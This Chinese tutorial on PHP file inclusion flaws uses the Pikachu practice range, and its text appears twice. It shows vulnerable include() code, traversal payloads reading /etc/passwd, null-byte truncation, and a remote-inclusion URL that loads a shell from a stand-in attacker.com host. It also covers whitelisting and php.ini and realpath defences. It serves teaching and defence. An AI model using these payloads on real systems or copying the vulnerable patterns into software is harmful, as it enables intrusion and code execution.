从Pikachu靶场看PHP文件包含漏洞的攻防艺术当你在Pikachu靶场中第一次成功利用文件包含漏洞读取到系统文件时那种原来如此的顿悟感正是安全研究的魅力所在。但真正的价值不在于复现几个漏洞而在于理解这些漏洞背后PHP引擎的工作机制。本文将带你深入PHP文件包含的底层逻辑让你不仅能玩转Pikachu靶场更能从根本上预防这类漏洞。1. 文件包含漏洞的本质剖析文件包含漏洞之所以危险根源在于PHP处理文件路径时的信任机制。让我们先看一个典型的危险代码片段// 危险示例直接使用用户输入作为包含路径 $file $_GET[filename]; include($file);这种写法的问题在于开发者假设用户只会提供合法的文件名。但攻击者往往会尝试这样的payloadhttp://example.com/?filename../../etc/passwd1.1 PHP包含函数的家族PHP提供了四个包含函数它们在错误处理上有所不同函数文件不存在时多次包含同一文件include()产生警告每次都会包含require()产生错误每次都会包含include_once()产生警告仅包含一次require_once()产生错误仅包含一次关键点无论使用哪种包含函数如果路径可控都存在安全风险。require系列函数虽然更严格但同样无法防止目录遍历攻击。1.2 路径解析的陷阱PHP在解析相对路径时会遵循操作系统的路径解析规则。例如include(./config/ . $_GET[file]); // 看似安全实则仍可被绕过攻击者可以使用../../../跳出限制目录。更隐蔽的攻击是使用空字节截断PHP5.3file../../etc/passwd%00即使开发者添加了后缀include($_GET[file] . .php); // 攻击者传入%00可截断.php后缀2. Pikachu靶场实战解析让我们解剖Pikachu靶场中的两个典型场景理解漏洞的利用原理。2.1 本地文件包含(LFI)漏洞Pikachu的LFI关卡展示了一个球星信息查询功能。表面上看它通过参数控制加载不同的模板文件http://pikachu/vul/fileinclude/fi_local.php?filenamefile1.php但仔细观察我们发现文件命名有规律file1.php到file5.php没有对输入进行路径净化于是可以构造经典的目录遍历攻击http://pikachu/vul/fileinclude/fi_local.php?filename../../../../etc/passwd为什么这种攻击能成功PHP的include会解析相对路径Web服务器进程有权限读取系统文件没有open_basedir限制或限制不严格2.2 远程文件包含(RFI)漏洞RFI更加危险因为它允许从外部URL加载代码。Pikachu的RFI关卡需要两个前提allow_url_includeOnphp.ini配置可控的完整URL参数典型的攻击流程在攻击者服务器放置恶意代码如shell.txt通过包含触发执行http://pikachu/vul/fileinclude/fi_remote.php?filenamehttp://attacker.com/shell.txtRFI的杀伤力在于完全绕过本地文件系统限制可动态加载最新攻击载荷常用于建立持久化后门3. PHP引擎的内部机制要真正理解这些漏洞我们需要看看PHP处理包含语句时发生了什么。3.1 包含语句的编译过程当PHP引擎遇到include语句时解析器将路径参数转换为字符串调用Zend引擎的zend_resolve_path()函数该函数依次检查是否是相对路径基于当前脚本目录是否是绝对路径如果是URL且allow_url_include开启则作为远程资源处理最终将解析后的文件内容插入当前执行流3.2 安全机制的短板PHP提供了一些安全配置但都有局限性open_basedir可限制文件访问范围但配置复杂allow_url_include默认关闭但某些CMS会主动开启disable_functions无法防止已授权的文件操作最根本的问题是PHP设计初衷是灵活的模板语言这种灵活性带来了安全代价。4. 从攻击到防御的思维转变理解了攻击原理后我们可以建立更有效的防御策略。4.1 输入验证的最佳实践不安全的方式$file str_replace(../, , $_GET[file]); // 容易被绕过推荐方案// 白名单验证 $allowed [news, products, contact]; $page $_GET[page]; if (!in_array($page, $allowed)) { die(Invalid request); } include(/templates/$page.php);4.2 系统层加固除了代码层面的防护服务器配置也至关重要php.ini关键设置allow_url_fopen Off allow_url_include Off open_basedir /var/www/htmlWeb服务器权限# 确保Web进程以最小权限运行 chown -R www-data:www-data /var/www/html chmod -R 750 /var/www/html4.3 现代框架的安全实践现代PHP框架通常内置了安全的视图加载机制。以Laravel为例// Laravel的视图加载会自动防止目录遍历 return view(profile, [user User::findOrFail($id)]);这种设计的好处是视图文件与路由绑定不直接暴露文件系统自动处理路径解析开发者无需手动拼接5. 靶场之外的实战思考Pikachu靶场教会我们的不仅是技术更是一种安全思维。在真实环境中代码审计时特别关注所有文件操作函数include/require系列file_get_contentsfopen/fread注意看似无害的二次包含// config.php $lang $_COOKIE[lang]; include(lang/$lang.php);日志文件往往成为LFI的跳板通过包含Apache日志注入PHP代码利用php://filter协议读取源码在防御方面我习惯在项目中添加这样的安全检查/** * 安全包含文件 */ function safe_include($path, $base_dir __DIR__) { $real_path realpath($base_dir . / . $path); if ($real_path false || strpos($real_path, $base_dir) ! 0) { throw new Exception(Invalid file path); } include($real_path); }这种防御思路的核心是不信任任何输入验证完整路径。通过realpath函数解析真实路径并确保它在允许的基目录下。
别再死记硬背了!通过Pikachu靶场的File Inclusion漏洞,深入理解PHP文件包含的底层逻辑
发布时间:2026/5/19 23:21:44
从Pikachu靶场看PHP文件包含漏洞的攻防艺术当你在Pikachu靶场中第一次成功利用文件包含漏洞读取到系统文件时那种原来如此的顿悟感正是安全研究的魅力所在。但真正的价值不在于复现几个漏洞而在于理解这些漏洞背后PHP引擎的工作机制。本文将带你深入PHP文件包含的底层逻辑让你不仅能玩转Pikachu靶场更能从根本上预防这类漏洞。1. 文件包含漏洞的本质剖析文件包含漏洞之所以危险根源在于PHP处理文件路径时的信任机制。让我们先看一个典型的危险代码片段// 危险示例直接使用用户输入作为包含路径 $file $_GET[filename]; include($file);这种写法的问题在于开发者假设用户只会提供合法的文件名。但攻击者往往会尝试这样的payloadhttp://example.com/?filename../../etc/passwd1.1 PHP包含函数的家族PHP提供了四个包含函数它们在错误处理上有所不同函数文件不存在时多次包含同一文件include()产生警告每次都会包含require()产生错误每次都会包含include_once()产生警告仅包含一次require_once()产生错误仅包含一次关键点无论使用哪种包含函数如果路径可控都存在安全风险。require系列函数虽然更严格但同样无法防止目录遍历攻击。1.2 路径解析的陷阱PHP在解析相对路径时会遵循操作系统的路径解析规则。例如include(./config/ . $_GET[file]); // 看似安全实则仍可被绕过攻击者可以使用../../../跳出限制目录。更隐蔽的攻击是使用空字节截断PHP5.3file../../etc/passwd%00即使开发者添加了后缀include($_GET[file] . .php); // 攻击者传入%00可截断.php后缀2. Pikachu靶场实战解析让我们解剖Pikachu靶场中的两个典型场景理解漏洞的利用原理。2.1 本地文件包含(LFI)漏洞Pikachu的LFI关卡展示了一个球星信息查询功能。表面上看它通过参数控制加载不同的模板文件http://pikachu/vul/fileinclude/fi_local.php?filenamefile1.php但仔细观察我们发现文件命名有规律file1.php到file5.php没有对输入进行路径净化于是可以构造经典的目录遍历攻击http://pikachu/vul/fileinclude/fi_local.php?filename../../../../etc/passwd为什么这种攻击能成功PHP的include会解析相对路径Web服务器进程有权限读取系统文件没有open_basedir限制或限制不严格2.2 远程文件包含(RFI)漏洞RFI更加危险因为它允许从外部URL加载代码。Pikachu的RFI关卡需要两个前提allow_url_includeOnphp.ini配置可控的完整URL参数典型的攻击流程在攻击者服务器放置恶意代码如shell.txt通过包含触发执行http://pikachu/vul/fileinclude/fi_remote.php?filenamehttp://attacker.com/shell.txtRFI的杀伤力在于完全绕过本地文件系统限制可动态加载最新攻击载荷常用于建立持久化后门3. PHP引擎的内部机制要真正理解这些漏洞我们需要看看PHP处理包含语句时发生了什么。3.1 包含语句的编译过程当PHP引擎遇到include语句时解析器将路径参数转换为字符串调用Zend引擎的zend_resolve_path()函数该函数依次检查是否是相对路径基于当前脚本目录是否是绝对路径如果是URL且allow_url_include开启则作为远程资源处理最终将解析后的文件内容插入当前执行流3.2 安全机制的短板PHP提供了一些安全配置但都有局限性open_basedir可限制文件访问范围但配置复杂allow_url_include默认关闭但某些CMS会主动开启disable_functions无法防止已授权的文件操作最根本的问题是PHP设计初衷是灵活的模板语言这种灵活性带来了安全代价。4. 从攻击到防御的思维转变理解了攻击原理后我们可以建立更有效的防御策略。4.1 输入验证的最佳实践不安全的方式$file str_replace(../, , $_GET[file]); // 容易被绕过推荐方案// 白名单验证 $allowed [news, products, contact]; $page $_GET[page]; if (!in_array($page, $allowed)) { die(Invalid request); } include(/templates/$page.php);4.2 系统层加固除了代码层面的防护服务器配置也至关重要php.ini关键设置allow_url_fopen Off allow_url_include Off open_basedir /var/www/htmlWeb服务器权限# 确保Web进程以最小权限运行 chown -R www-data:www-data /var/www/html chmod -R 750 /var/www/html4.3 现代框架的安全实践现代PHP框架通常内置了安全的视图加载机制。以Laravel为例// Laravel的视图加载会自动防止目录遍历 return view(profile, [user User::findOrFail($id)]);这种设计的好处是视图文件与路由绑定不直接暴露文件系统自动处理路径解析开发者无需手动拼接5. 靶场之外的实战思考Pikachu靶场教会我们的不仅是技术更是一种安全思维。在真实环境中代码审计时特别关注所有文件操作函数include/require系列file_get_contentsfopen/fread注意看似无害的二次包含// config.php $lang $_COOKIE[lang]; include(lang/$lang.php);日志文件往往成为LFI的跳板通过包含Apache日志注入PHP代码利用php://filter协议读取源码在防御方面我习惯在项目中添加这样的安全检查/** * 安全包含文件 */ function safe_include($path, $base_dir __DIR__) { $real_path realpath($base_dir . / . $path); if ($real_path false || strpos($real_path, $base_dir) ! 0) { throw new Exception(Invalid file path); } include($real_path); }这种防御思路的核心是不信任任何输入验证完整路径。通过realpath函数解析真实路径并确保它在允许的基目录下。
)
)
